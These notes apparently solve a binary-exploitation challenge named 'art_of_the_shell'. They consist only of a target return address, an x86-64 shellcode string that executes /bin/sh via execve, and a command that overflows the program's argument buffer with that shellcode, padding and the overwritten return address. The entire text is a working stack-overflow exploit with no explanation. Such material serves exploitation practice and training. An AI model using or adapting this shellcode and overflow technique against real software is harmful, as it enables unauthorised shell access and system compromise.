Addresses
=========================================================
callq rip - 0x40052c

Compiled shellcode
=========================================================
\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05\xeb\xfe

Exploit command
=========================================================
./art_of_the_shell `echo -ne "\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05\xeb\xfeAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC\x2c\x05\x40"`